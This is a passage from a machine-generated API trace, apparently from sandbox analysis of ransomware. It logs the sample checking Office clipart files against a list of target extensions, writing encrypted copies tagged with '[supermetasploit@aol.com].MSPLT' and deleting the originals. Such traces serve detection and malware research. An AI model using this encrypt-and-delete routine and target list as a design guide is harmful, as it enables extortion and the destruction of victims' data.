lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesRead=0x349fecc*=0x0, lpOverlapped=0x0) returned 1 [0319.982] WriteFile (in: hFile=0x538, lpBuffer=0x3db7020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x349fc94, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesWritten=0x349fc94*=0xec, lpOverlapped=0x0) returned 1 [0319.982] SetEndOfFile (hFile=0x538) returned 1 [0319.983] CloseHandle (hObject=0x538) returned 1 [0319.983] SetFilePointerEx (in: hFile=0x534, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x349fec0 | out: lpNewFilePointer=0x0) returned 1 [0319.983] SetEndOfFile (hFile=0x534) returned 1 [0319.987] CloseHandle (hObject=0x534) returned 1 [0319.987] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NBOOK_01.MID.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0319.987] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NBOOK_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\nbook_01.mid")) returned 1 [0319.988] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NBOOK_01.MID") returned 68 [0319.989] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NBOOK_01.MID") returned 68 [0319.989] lstrlenW (lpString=".doc") returned 4 [0319.989] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0319.989] lstrlenW (lpString=".docx") returned 5 [0319.989] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0319.989] lstrlenW (lpString=".pdf") returned 4 [0319.989] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0319.989] lstrlenW (lpString=".xls") returned 4 [0319.989] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0319.989] lstrlenW (lpString=".xlsx") returned 5 [0319.989] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0319.989] lstrlenW (lpString=".ppt") returned 4 [0319.989] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0319.989] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NBOOK_01.MID") returned 68 [0319.989] lstrlenW (lpString=".zip") returned 4 [0319.989] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0319.989] lstrlenW (lpString=".rar") returned 4 [0319.989] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0319.989] lstrlenW (lpString=".bz2") returned 4 [0319.989] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0319.989] lstrlenW (lpString=".7z") returned 3 [0319.989] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0319.989] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NBOOK_01.MID") returned 68 [0319.989] lstrlenW (lpString=".dbf") returned 4 [0319.989] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0319.989] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NBOOK_01.MID") returned 68 [0319.989] lstrlenW (lpString=".1cd") returned 4 [0319.990] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0319.990] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NBOOK_01.MID") returned 68 [0319.990] lstrlenW (lpString=".jpg") returned 4 [0319.990] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0319.990] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NBOOK_01.MID") returned 68 [0319.990] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NBOOK_01.MID") returned 68 [0319.990] lstrlenW (lpString=".doc") returned 4 [0319.990] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0319.990] lstrlenW (lpString=".docx") returned 5 [0319.990] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0319.990] lstrlenW (lpString=".pdf") returned 4 [0319.990] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0319.990] lstrlenW (lpString=".xls") returned 4 [0319.990] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0319.990] lstrlenW (lpString=".xlsx") returned 5 [0319.990] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0319.990] lstrlenW (lpString=".ppt") returned 4 [0319.990] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0319.990] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NBOOK_01.MID") returned 68 [0319.990] lstrlenW (lpString=".zip") returned 4 [0319.990] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0319.990] lstrlenW (lpString=".rar") returned 4 [0319.990] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0319.990] lstrlenW (lpString=".bz2") returned 4 [0319.990] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0319.990] lstrlenW (lpString=".7z") returned 3 [0319.991] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0319.991] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NBOOK_01.MID") returned 68 [0319.991] lstrlenW (lpString=".dbf") returned 4 [0319.991] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0319.991] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NBOOK_01.MID") returned 68 [0319.991] lstrlenW (lpString=".1cd") returned 4 [0319.991] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0319.991] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NBOOK_01.MID") returned 68 [0319.991] lstrlenW (lpString=".jpg") returned 4 [0319.991] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0319.991] lstrcmpiW (lpString1=".MID", lpString2=".MSPLT") returned -1 [0319.991] lstrlenW (lpString="OUTDR_01.MID") returned 12 [0319.991] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\OUTDR_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\outdr_01.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x534 [0319.993] GetFileSizeEx (in: hFile=0x534, lpFileSize=0x349ff14 | out: lpFileSize=0x349ff14*=6644) returned 1 [0319.993] CloseHandle (hObject=0x534) returned 1 [0319.993] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\OUTDR_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\outdr_01.mid")) returned 0x220 [0319.993] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\OUTDR_01.MID.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\outdr_01.mid.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0319.994] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\OUTDR_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\outdr_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x534 [0319.994] SetFilePointerEx (in: hFile=0x534, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x349fec0 | out: lpNewFilePointer=0x0) returned 1 [0319.994] SetFilePointerEx (in: hFile=0x534, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x349fec0 | out: lpNewFilePointer=0x0) returned 1 [0319.994] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\OUTDR_01.MID.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\outdr_01.mid.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x538 [0319.995] GetLastError () returned 0x0 [0319.995] ReadFile (in: hFile=0x534, lpBuffer=0x3db7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x349fecc, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesRead=0x349fecc*=0x19f4, lpOverlapped=0x0) returned 1 [0320.114] WriteFile (in: hFile=0x538, lpBuffer=0x3db7020*, nNumberOfBytesToWrite=0x1a00, lpNumberOfBytesWritten=0x349fc94, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesWritten=0x349fc94*=0x1a00, lpOverlapped=0x0) returned 1 [0320.116] ReadFile (in: hFile=0x534, lpBuffer=0x3db7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x349fecc, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesRead=0x349fecc*=0x0, lpOverlapped=0x0) returned 1 [0320.116] WriteFile (in: hFile=0x538, lpBuffer=0x3db7020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x349fc94, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesWritten=0x349fc94*=0xec, lpOverlapped=0x0) returned 1 [0320.116] SetEndOfFile (hFile=0x538) returned 1 [0320.116] CloseHandle (hObject=0x538) returned 1 [0320.116] SetFilePointerEx (in: hFile=0x534, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x349fec0 | out: lpNewFilePointer=0x0) returned 1 [0320.116] SetEndOfFile (hFile=0x534) returned 1 [0320.120] CloseHandle (hObject=0x534) returned 1 [0320.120] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\OUTDR_01.MID.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0320.462] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\OUTDR_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\outdr_01.mid")) returned 1 [0320.463] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\OUTDR_01.MID") returned 68 [0320.463] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\OUTDR_01.MID") returned 68 [0320.464] lstrlenW (lpString=".doc") returned 4 [0320.464] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0320.464] lstrlenW (lpString=".docx") returned 5 [0320.464] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0320.464] lstrlenW (lpString=".pdf") returned 4 [0320.464] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0320.464] lstrlenW (lpString=".xls") returned 4 [0320.464] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0320.464] lstrlenW (lpString=".xlsx") returned 5 [0320.464] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0320.464] lstrlenW (lpString=".ppt") returned 4 [0320.464] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0320.464] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\OUTDR_01.MID") returned 68 [0320.464] lstrlenW (lpString=".zip") returned 4 [0320.464] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0320.464] lstrlenW (lpString=".rar") returned 4 [0320.464] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0320.464] lstrlenW (lpString=".bz2") returned 4 [0320.464] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0320.464] lstrlenW (lpString=".7z") returned 3 [0320.464] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0320.464] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\OUTDR_01.MID") returned 68 [0320.465] lstrlenW (lpString=".dbf") returned 4 [0320.465] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0320.465] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\OUTDR_01.MID") returned 68 [0320.465] lstrlenW (lpString=".1cd") returned 4 [0320.465] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0320.465] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\OUTDR_01.MID") returned 68 [0320.465] lstrlenW (lpString=".jpg") returned 4 [0320.465] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0320.465] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\OUTDR_01.MID") returned 68 [0320.465] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\OUTDR_01.MID") returned 68 [0320.465] lstrlenW (lpString=".doc") returned 4 [0320.465] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0320.465] lstrlenW (lpString=".docx") returned 5 [0320.465] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0320.465] lstrlenW (lpString=".pdf") returned 4 [0320.465] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0320.465] lstrlenW (lpString=".xls") returned 4 [0320.465] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0320.465] lstrlenW (lpString=".xlsx") returned 5 [0320.465] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0320.465] lstrlenW (lpString=".ppt") returned 4 [0320.465] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0320.466] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\OUTDR_01.MID") returned 68 [0320.466] lstrlenW (lpString=".zip") returned 4 [0320.466] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0320.466] lstrlenW (lpString=".rar") returned 4 [0320.466] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0320.466] lstrlenW (lpString=".bz2") returned 4 [0320.466] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0320.466] lstrlenW (lpString=".7z") returned 3 [0320.466] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0320.466] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\OUTDR_01.MID") returned 68 [0320.466] lstrlenW (lpString=".dbf") returned 4 [0320.466] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0320.466] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\OUTDR_01.MID") returned 68 [0320.466] lstrlenW (lpString=".1cd") returned 4 [0320.466] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0320.466] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\OUTDR_01.MID") returned 68 [0320.466] lstrlenW (lpString=".jpg") returned 4 [0320.466] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0320.467] lstrcmpiW (lpString1=".MID", lpString2=".MSPLT") returned -1 [0320.467] lstrlenW (lpString="PARNT_05.MID") returned 12 [0320.467] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_05.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\parnt_05.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x554 [0320.468] GetFileSizeEx (in: hFile=0x554, lpFileSize=0x349ff14 | out: lpFileSize=0x349ff14*=6020) returned 1 [0320.468] CloseHandle (hObject=0x554) returned 1 [0320.468] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_05.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\parnt_05.mid")) returned 0x220 [0320.469] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_05.MID.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\parnt_05.mid.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0320.469] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_05.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\parnt_05.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x554 [0320.469] SetFilePointerEx (in: hFile=0x554, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x349fec0 | out: lpNewFilePointer=0x0) returned 1 [0320.469] SetFilePointerEx (in: hFile=0x554, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x349fec0 | out: lpNewFilePointer=0x0) returned 1 [0320.469] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_05.MID.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\parnt_05.mid.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x420 [0320.470] GetLastError () returned 0x0 [0320.470] ReadFile (in: hFile=0x554, lpBuffer=0x3db7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x349fecc, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesRead=0x349fecc*=0x1784, lpOverlapped=0x0) returned 1 [0320.474] WriteFile (in: hFile=0x420, lpBuffer=0x3db7020*, nNumberOfBytesToWrite=0x1790, lpNumberOfBytesWritten=0x349fc94, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesWritten=0x349fc94*=0x1790, lpOverlapped=0x0) returned 1 [0320.476] ReadFile (in: hFile=0x554, lpBuffer=0x3db7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x349fecc, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesRead=0x349fecc*=0x0, lpOverlapped=0x0) returned 1 [0320.476] WriteFile (in: hFile=0x420, lpBuffer=0x3db7020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x349fc94, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesWritten=0x349fc94*=0xec, lpOverlapped=0x0) returned 1 [0320.477] SetEndOfFile (hFile=0x420) returned 1 [0320.477] CloseHandle (hObject=0x420) returned 1 [0320.477] SetFilePointerEx (in: hFile=0x554, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x349fec0 | out: lpNewFilePointer=0x0) returned 1 [0320.477] SetEndOfFile (hFile=0x554) returned 1 [0320.482] CloseHandle (hObject=0x554) returned 1 [0320.482] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_05.MID.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0320.483] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_05.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\parnt_05.mid")) returned 1 [0320.484] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_05.MID") returned 68 [0320.484] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_05.MID") returned 68 [0320.484] lstrlenW (lpString=".doc") returned 4 [0320.484] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0320.485] lstrlenW (lpString=".docx") returned 5 [0320.485] lstrcmpiW (lpString1=".docx", lpString2="5.MID") returned -1 [0320.485] lstrlenW (lpString=".pdf") returned 4 [0320.485] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0320.485] lstrlenW (lpString=".xls") returned 4 [0320.485] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0320.485] lstrlenW (lpString=".xlsx") returned 5 [0320.485] lstrcmpiW (lpString1=".xlsx", lpString2="5.MID") returned -1 [0320.485] lstrlenW (lpString=".ppt") returned 4 [0320.485] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0320.485] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_05.MID") returned 68 [0320.485] lstrlenW (lpString=".zip") returned 4 [0320.485] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0320.485] lstrlenW (lpString=".rar") returned 4 [0320.485] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0320.485] lstrlenW (lpString=".bz2") returned 4 [0320.485] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0320.486] lstrlenW (lpString=".7z") returned 3 [0320.486] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0320.486] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_05.MID") returned 68 [0320.486] lstrlenW (lpString=".dbf") returned 4 [0320.486] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0320.486] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_05.MID") returned 68 [0320.486] lstrlenW (lpString=".1cd") returned 4 [0320.486] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0320.486] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_05.MID") returned 68 [0320.486] lstrlenW (lpString=".jpg") returned 4 [0320.486] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0320.486] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_05.MID") returned 68 [0320.486] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_05.MID") returned 68 [0320.486] lstrlenW (lpString=".doc") returned 4 [0320.486] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0320.486] lstrlenW (lpString=".docx") returned 5 [0320.487] lstrcmpiW (lpString1=".docx", lpString2="5.MID") returned -1 [0320.487] lstrlenW (lpString=".pdf") returned 4 [0320.487] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0320.487] lstrlenW (lpString=".xls") returned 4 [0320.487] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0320.487] lstrlenW (lpString=".xlsx") returned 5 [0320.487] lstrcmpiW (lpString1=".xlsx", lpString2="5.MID") returned -1 [0320.487] lstrlenW (lpString=".ppt") returned 4 [0320.487] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0320.487] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_05.MID") returned 68 [0320.487] lstrlenW (lpString=".zip") returned 4 [0320.487] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0320.487] lstrlenW (lpString=".rar") returned 4 [0320.487] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0320.488] lstrlenW (lpString=".bz2") returned 4 [0320.488] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0320.488] lstrlenW (lpString=".7z") returned 3 [0320.488] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0320.488] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_05.MID") returned 68 [0320.488] lstrlenW (lpString=".dbf") returned 4 [0320.488] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0320.488] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_05.MID") returned 68 [0320.488] lstrlenW (lpString=".1cd") returned 4 [0320.488] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0320.488] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_05.MID") returned 68 [0320.488] lstrlenW (lpString=".jpg") returned 4 [0320.489] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0320.489] lstrcmpiW (lpString1=".MID", lpString2=".MSPLT") returned -1 [0320.489] lstrlenW (lpString="PARNT_06.MID") returned 12 [0320.489] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_06.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\parnt_06.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x554 [0320.490] GetFileSizeEx (in: hFile=0x554, lpFileSize=0x349ff14 | out: lpFileSize=0x349ff14*=7768) returned 1 [0320.490] CloseHandle (hObject=0x554) returned 1 [0320.490] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_06.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\parnt_06.mid")) returned 0x220 [0320.490] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_06.MID.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\parnt_06.mid.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0320.491] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_06.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\parnt_06.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x554 [0320.491] SetFilePointerEx (in: hFile=0x554, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x349fec0 | out: lpNewFilePointer=0x0) returned 1 [0320.491] SetFilePointerEx (in: hFile=0x554, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x349fec0 | out: lpNewFilePointer=0x0) returned 1 [0320.491] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_06.MID.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\parnt_06.mid.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x420 [0320.493] GetLastError () returned 0x0 [0320.493] ReadFile (in: hFile=0x554, lpBuffer=0x3db7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x349fecc, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesRead=0x349fecc*=0x1e58, lpOverlapped=0x0) returned 1 [0320.668] WriteFile (in: hFile=0x420, lpBuffer=0x3db7020*, nNumberOfBytesToWrite=0x1e60, lpNumberOfBytesWritten=0x349fc94, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesWritten=0x349fc94*=0x1e60, lpOverlapped=0x0) returned 1 [0320.671] ReadFile (in: hFile=0x554, lpBuffer=0x3db7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x349fecc, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesRead=0x349fecc*=0x0, lpOverlapped=0x0) returned 1 [0320.671] WriteFile (in: hFile=0x420, lpBuffer=0x3db7020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x349fc94, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesWritten=0x349fc94*=0xec, lpOverlapped=0x0) returned 1 [0320.671] SetEndOfFile (hFile=0x420) returned 1 [0320.744] CloseHandle (hObject=0x420) returned 1 [0320.744] SetFilePointerEx (in: hFile=0x554, liDistanceToMove=0x0, lpNewFilePointer=0x0, 